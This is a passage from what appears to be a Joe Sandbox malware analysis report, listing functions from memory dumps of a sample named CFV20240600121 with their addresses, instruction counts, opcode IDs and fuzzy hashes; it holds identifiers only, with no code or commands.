                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: k
                                        • API String ID: 0-140662621
                                        • Opcode ID: d76f6dc46964980076b71656a95efd078c25ba74f4f8a4e90a23997bd278f2e3
                                        • Instruction ID: 9906142400bed3ec0fefd012d85c1314e69cc2c7d320b475a77afbfff55d59da
                                        • Opcode Fuzzy Hash: d76f6dc46964980076b71656a95efd078c25ba74f4f8a4e90a23997bd278f2e3
                                        • Instruction Fuzzy Hash: C6212C5285E3E05FD713AB3C99B45C53F65AF53214F0A00E7C8D49F0A7E64A885CC3AA
                                        Function 077DF878 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 848db4295e7ce1ad2b6f07852e1cd235b025b3c93124704ce8706e8a2ea5f925
                                        • Instruction ID: f9e2c4aa17864a1ac7eef4918bdcc3b1da816fd70ea5c29becf273b82ef77525
                                        • Opcode Fuzzy Hash: 848db4295e7ce1ad2b6f07852e1cd235b025b3c93124704ce8706e8a2ea5f925
                                        • Instruction Fuzzy Hash: 37114CB1F0021A8BCB04EBB999115FEB6F6AFC8650F604479C516E7240EB358E02CBA5
                                        Function 077DFEBC Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x=
                                        • API String ID: 0-1631010296
                                        • Opcode ID: abcc6688a3b47cd964721c442cf0f8c0a3916eab6638b2e1b5411b82233fb5b7
                                        • Instruction ID: 128e552ccf31824ffb662688fef20a7f661223042e0ba28e1b9713d2c640fc7b
                                        • Opcode Fuzzy Hash: abcc6688a3b47cd964721c442cf0f8c0a3916eab6638b2e1b5411b82233fb5b7
                                        • Instruction Fuzzy Hash: 5001ECB0D0021ADFDB24CF6AC8447EE7AF5BF49360F208625E825EA190D7744A84CBD1
                                        Function 077D0461 Relevance: .3, Instructions: 271COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d77a06ac0b12e4a25752e0d5d9f37bccab7298f64419b2b71e600b136c8fe2a
                                        • Instruction ID: a0a387d828fc69772028708b714cf15bf127e700ac1494dd9852bd2e1e259f34
                                        • Opcode Fuzzy Hash: 9d77a06ac0b12e4a25752e0d5d9f37bccab7298f64419b2b71e600b136c8fe2a
                                        • Instruction Fuzzy Hash: 29A10470600205CFC715CF69D8449AAFBFAFF85354F14896AD44ACB252DB30ED8ACBA0
                                        Function 077D0590 Relevance: .2, Instructions: 224COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf8d65c934e4583d9047c4150633d4fffe8bc9ebf010bba49b80155d842dcdbc
                                        • Instruction ID: aa987d451baef01008855493590c887de453b6bb3204a0864e202b95c731b96b
                                        • Opcode Fuzzy Hash: bf8d65c934e4583d9047c4150633d4fffe8bc9ebf010bba49b80155d842dcdbc
                                        • Instruction Fuzzy Hash: 8E91CFB0A00606CFCB15CF68C5849AABBF6FF85320F54C969D45A8B255DB30ED49CFA1
                                        Function 077D4E90 Relevance: .2, Instructions: 214COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc21ba06074c88a211a269fe783d721b972bd589277405a05adc9e0fc4d8528f
                                        • Instruction ID: 588db922a62fbedb04d35066f33b655cd726dec0548c89f4f7f1d689d54da595
                                        • Opcode Fuzzy Hash: cc21ba06074c88a211a269fe783d721b972bd589277405a05adc9e0fc4d8528f
                                        • Instruction Fuzzy Hash: 0E9188B4E0020A9FDB44DFA8D9849DDBBB6FF88300F208669D519AB359D731AD45CF90
                                        Function 077DC798 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc5768003ea756f3d496c77a9bc4b49a0652fa5cf50df1b67fdf71a69470b4de
                                        • Instruction ID: 01a810844cbd2452a7459310f849e473c0bacfce69708a3ca4b0ac79059031db
                                        • Opcode Fuzzy Hash: cc5768003ea756f3d496c77a9bc4b49a0652fa5cf50df1b67fdf71a69470b4de
                                        • Instruction Fuzzy Hash: 1B7182B1A05255CFDB16CF68C584A6DFBF6FF853A0F058A96D051AB2A6C334EC40CB60
                                        Function 077DC788 Relevance: .2, Instructions: 176COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a10df7548e039cb6c10bc9b21abaf1c86e2077436272aeb2b21f3a7263f7347
                                        • Instruction ID: 23d219f8a6862b9f5481705174dd0e1841f96e64842a3c0e788767c362fe2047
                                        • Opcode Fuzzy Hash: 3a10df7548e039cb6c10bc9b21abaf1c86e2077436272aeb2b21f3a7263f7347
                                        • Instruction Fuzzy Hash: F47171B1A05215CFDB15CF68C584E69F7F6FF853A0F158A96D052AB2A6C330EC40CB60
                                        Function 077DBD0A Relevance: .1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 941180effbd0784f0a337400f75b036ba682b42b79afa52163924b92404677b3
                                        • Instruction ID: 3205a3419a0a4121503ff67ab0f8d9e1d3ad68d35d33c8db441c44e281e3b332
                                        • Opcode Fuzzy Hash: 941180effbd0784f0a337400f75b036ba682b42b79afa52163924b92404677b3
                                        • Instruction Fuzzy Hash: 1B31E0B4909B80CFC3229B38A5641447FF1BF8630270A89DBC5C5CBAB3C7399859C716
                                        Function 0DC303F0 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6ff5da0952a30e2778cb7665c8862371d1fddda5669b0140fead1cfe486f063
                                        • Instruction ID: be9aa6ddfb786a564165b83bf5a241aa6ef62036f367a0ebe4028ddac36cf3ce
                                        • Opcode Fuzzy Hash: d6ff5da0952a30e2778cb7665c8862371d1fddda5669b0140fead1cfe486f063
                                        • Instruction Fuzzy Hash: 23413871D0921A9FCB00CFA6D5416AEFBB5BF89200F10D4AAD019A7255D3388B00DF66
                                        Function 0DC30400 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1278d7c49cb15348b1fef75ba2151fef08a764471dbcc5c09ae3b335dd2f189c
                                        • Instruction ID: 349518532b91b2135cc3c438e85f50fc4351c4a7d829230ac6f65a37a0625e17
                                        • Opcode Fuzzy Hash: 1278d7c49cb15348b1fef75ba2151fef08a764471dbcc5c09ae3b335dd2f189c
                                        • Instruction Fuzzy Hash: F74125B1D0521EDFCB04CFA6D5416AEFBF6BB89200F10D46A9019B7254E3789B00DFA5
                                        Function 077DF5D8 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: beeb865a936b1cff545d83f9818ef3c1ff6ebc03cc36b12cf75d1102c7e29a8d
                                        • Instruction ID: aaffe0f80a8c8b0ac64ee35a8fd10fb20f9acbb458083b584dace1e66e8a5985
                                        • Opcode Fuzzy Hash: beeb865a936b1cff545d83f9818ef3c1ff6ebc03cc36b12cf75d1102c7e29a8d
                                        • Instruction Fuzzy Hash: F63112B4E012099FCB04CFA9D8445EEBBB2FF89350F10842AE926A7768D7349941CF90
                                        Function 077D2F20 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b283bcf0d53215afb30c3ecacd69516bc4aaa536db0ca7af2e092c10998f3ea
                                        • Instruction ID: 767f118cf2059dd79cd230d21d22c46a8eb455964d9d845f5828fb336f321ff6
                                        • Opcode Fuzzy Hash: 1b283bcf0d53215afb30c3ecacd69516bc4aaa536db0ca7af2e092c10998f3ea
                                        • Instruction Fuzzy Hash: 532128726046409FCB168F18D8849AABBB2FF85350B148D9FF685CB263C732DD42CB51
                                        Function 077DA180 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e1a8d8eb2f971cad5a8dc50820b29218df1f89e2a7e2af68120bfa107090ac2
                                        • Instruction ID: eacb91fc104191c5fcd2a9b1965ad45bad3f878ee8107a7a5e6570f764949681
                                        • Opcode Fuzzy Hash: 0e1a8d8eb2f971cad5a8dc50820b29218df1f89e2a7e2af68120bfa107090ac2
                                        • Instruction Fuzzy Hash: A03126B4E05209EFCB44DFAAC5451AEBBF2FB89340F14C8AAC405E7258E7359E418B91
                                        Function 0176D3D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2087484250.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_176d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f13dfb054cb73944c856145a8d3e28d643de16958fa820f653e86585cea689b7
                                        • Instruction ID: d015eb58bbf437d14ea63f29ed57554361d9bdfcaa2f625ef05dd5f37b1d115e
                                        • Opcode Fuzzy Hash: f13dfb054cb73944c856145a8d3e28d643de16958fa820f653e86585cea689b7
                                        • Instruction Fuzzy Hash: 6B2136B1210244DFDB25DF98C9C0F56FF69FB98314F24C1A9DD490B256C33AE806C6A1
                                        Function 0176D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2087484250.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_176d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80b1801d38ba684291ba01a596efa6625f189cf91badc654b2b8a2ebf7b5000c
                                        • Instruction ID: bc6834f872bfd9a80702aceb9d71d189d0493587082834f25ce19f3b912d406e
                                        • Opcode Fuzzy Hash: 80b1801d38ba684291ba01a596efa6625f189cf91badc654b2b8a2ebf7b5000c
                                        • Instruction Fuzzy Hash: 7E21E271610240DFDB25DF58D980B26FF69FB88318F2485A9ED490A657C336D416C6A1
                                        Function 0177D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088601460.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_177d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 878ac797369093954560c9e751337435dcaf100c05b7b5d9ae9bfcd3ad93704c
                                        • Instruction ID: a6bb9e991022eff27b2180a0fce978d899516baac67a0c8e96721451fc43903d
                                        • Opcode Fuzzy Hash: 878ac797369093954560c9e751337435dcaf100c05b7b5d9ae9bfcd3ad93704c
                                        • Instruction Fuzzy Hash: 2D21B3716082049FDF25DF98D580B26FB65FF88324F24C5ADD9494B256C33AD446CA61
                                        Function 0177D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088601460.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_177d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 553ae8dfcbe94be25c523d94942d5b43cf30c3055e60d97eb83dfb916fe0d64e
                                        • Instruction ID: 1372b4b22175d398d52410819e048c0a478167ba97827a14b80f4dc7ceb3bd76
                                        • Opcode Fuzzy Hash: 553ae8dfcbe94be25c523d94942d5b43cf30c3055e60d97eb83dfb916fe0d64e
                                        • Instruction Fuzzy Hash: A6210071604204DFCF26DFA8D984B26FF65EF88314F20C5ADD90A0B256C33AD406CA61
                                        Function 077DA190 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 400a3c5da869a550a2d2524019e4388ca6cea4d9da5c9ef341075729d545bfbf
                                        • Instruction ID: b386b177d341b5f8c6217985268715a54723a820129d89c14bec61ff8a16e6ab
                                        • Opcode Fuzzy Hash: 400a3c5da869a550a2d2524019e4388ca6cea4d9da5c9ef341075729d545bfbf
                                        • Instruction Fuzzy Hash: 7021D5B4E05209DFCB44DFAAD5452AEBBF2FB89340F11C86A8805E7358E7359E418B91
                                        Function 077D7689 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de39a9db27033f47a27fd1003b72aa4faacee28d12cc7392110cb885a4301bc9
                                        • Instruction ID: 4786f24b2f8f332363fbfb4b258208df7fae90e7d5fa6b883cf2670fd253780d
                                        • Opcode Fuzzy Hash: de39a9db27033f47a27fd1003b72aa4faacee28d12cc7392110cb885a4301bc9
                                        • Instruction Fuzzy Hash: F7214BB0D052099FCB08CFA9C5855AEFBF2BF89340F24C5AAD415AB255E7309A41CF91
                                        Function 077D7780 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c770a067e32bc6456c7767157a6597309facaa03afe58b2ed575edc333a45d74
                                        • Instruction ID: f83f1237b5fe18ce22e4f0558f869552b3b10e7c3aeee42117c7145d7061a93c
                                        • Opcode Fuzzy Hash: c770a067e32bc6456c7767157a6597309facaa03afe58b2ed575edc333a45d74
                                        • Instruction Fuzzy Hash: CC211674E01109AFDB08DFA9C585A9EFBF2FF88300F54C4A9D419AB255D7309A15CB40
                                        Function 077D5B9C Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44aa9b5dfe51e8b554677a748f2a1d9e5982894fa10884909fe4e2acc4c50a17
                                        • Instruction ID: f5f5ecafea2a06625553fb21230230820d0388dc07accedbc07acb8756b4c8e7
                                        • Opcode Fuzzy Hash: 44aa9b5dfe51e8b554677a748f2a1d9e5982894fa10884909fe4e2acc4c50a17
                                        • Instruction Fuzzy Hash: C431F2B0C01218DFDB20DFA9C998B9EBFF4EB09754F24841AE415BB240C7B55845CFA1
                                        Function 077DFAFE Relevance: .1, Instructions: 65COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d49e00b8fb9467f140dabf1d79b9b13470c897c5cfc9f4c49bfb8ecfb79ec095
                                        • Instruction ID: 93ec191833c3e7a80cd93d099933914157429927cdd05742ace426e8e9d3d6af
                                        • Opcode Fuzzy Hash: d49e00b8fb9467f140dabf1d79b9b13470c897c5cfc9f4c49bfb8ecfb79ec095
                                        • Instruction Fuzzy Hash: E4310EB0D01258DFDB20CFA9C998BDEBFF0AB09314F24842AE419BB240C3B55845CFA1
                                        Function 077D7790 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a9deed7866d4f773784f57e803bbf9eb5c372e55be0fe2a06a8a39b1de656c6
                                        • Instruction ID: a73d0aa0bf99a37aaf27c9ae1d5b111d0f51234253e250da66e3a640403782ec
                                        • Opcode Fuzzy Hash: 9a9deed7866d4f773784f57e803bbf9eb5c372e55be0fe2a06a8a39b1de656c6
                                        • Instruction Fuzzy Hash: B22115B4E01109EFDB08CFA9C584A9EFBF6EF88310F54C4A9D419AB268D730DA00CB40
                                        Function 077D2F38 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8aa419565caadee35602a7d86f24ad4b1d2ec9cff34456c360b5abd8390c7ee
                                        • Instruction ID: 504bf97c7409d14d4b3709130523871be56d86f73f102bb8ad9f1d0e187ff715
                                        • Opcode Fuzzy Hash: f8aa419565caadee35602a7d86f24ad4b1d2ec9cff34456c360b5abd8390c7ee
                                        • Instruction Fuzzy Hash: EB11E5B2304540AFCB159F18D884CAABBB6FF89250B04485FF645CB662D7729D42DBA1
                                        Function 077DADF0 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45390ddcc3387dbf93871da2f185d86a9677d22f40912f2dc25ae3ab77493464
                                        • Instruction ID: c0fc1ff0e17aa23177452e3de9f1fda82af28cf2f0467cf59ab205e003711fdb
                                        • Opcode Fuzzy Hash: 45390ddcc3387dbf93871da2f185d86a9677d22f40912f2dc25ae3ab77493464
                                        • Instruction Fuzzy Hash: 4F1167B0E06209AFCF45CFA9C54519EFFB2BF8A210F24C5AAC415E7298E6349E51CB51
                                        Function 0176D4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2087484250.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_176d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 159e3e496d7eeb9ae61af8a3483043210b2d7d2ee773ffb2a130834d669bdb49
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 24119D76504280CFDB16CF54D5C4B16BF62FB88214F24C6A9DD490B657C336D45ACBA2
                                        Function 0176D3D3 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2087484250.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_176d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 5f3f1e650cff14d76d18ed62b68c16ad799bb1fc95bd0aa40fb9c03832aec1e7
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 9C11CD72504240CFDB12CF44D5C4B56BF62FB88224F24C6A9DD490A656C33AE85ACBA2
                                        Function 0177D017 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088601460.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_177d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 68107c99179ce778e368f9fd2be1c89ab9b7df34df7e2e4447bf7eb6b91362be
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: B111DD75504280CFDB22CF58D5C4B15FFA2FF88314F28C6AAD8494B656C33AD41ACBA2
                                        Function 0177D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088601460.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_177d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 5ed2da97f51089d30aa9bbe11b2c37b1fadebcf1bde0b24b3a21d5e9f2551d50
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: F911BB75508280DFDB12CF54C5C4B15FFA1FF84224F28C6A9D9494B296C33AD40ACB62
                                        Function 077D2BEF Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f44151eb7788131d91d26e8071c28c7d2127f8f340d90510678154cf65305ae
                                        • Instruction ID: 1eb535579ff572992d0c35fe9e748c40159055a2e64707e5589b675bed8d81c1
                                        • Opcode Fuzzy Hash: 7f44151eb7788131d91d26e8071c28c7d2127f8f340d90510678154cf65305ae
                                        • Instruction Fuzzy Hash: BF1194B0E05256CFCB41EFA4C8945AEBBB1BF09210F14819AD959EB362C7389D02CBC5
                                        Function 077DBE50 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ac44d75b834dcc8a42b96df0c7a04997964f256d7a7bbfbb359fe825878b276
                                        • Instruction ID: 77069c97e8a37475852e81424f2cdd053e729ed8ec89bee04dba0b3859f0f2f9
                                        • Opcode Fuzzy Hash: 1ac44d75b834dcc8a42b96df0c7a04997964f256d7a7bbfbb359fe825878b276
                                        • Instruction Fuzzy Hash: 791182F0218944DFC740CF25F4446687FB2FB4E385F6284D6EA868B255DA32CCA6C745
                                        Function 077DAE00 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7c571e82bf1c527f74c0c8537406590a8d60db7fd65f32d367cea691f6acef4
                                        • Instruction ID: 762ef674f851335431d56d3d1db6a032cd188a795ff8ae131def883ed8998786
                                        • Opcode Fuzzy Hash: f7c571e82bf1c527f74c0c8537406590a8d60db7fd65f32d367cea691f6acef4
                                        • Instruction Fuzzy Hash: FF1115B0E15209EFCB44CFA9D6456AEFBB6BB89340F20C4BA8405E3258E7349E41CB50
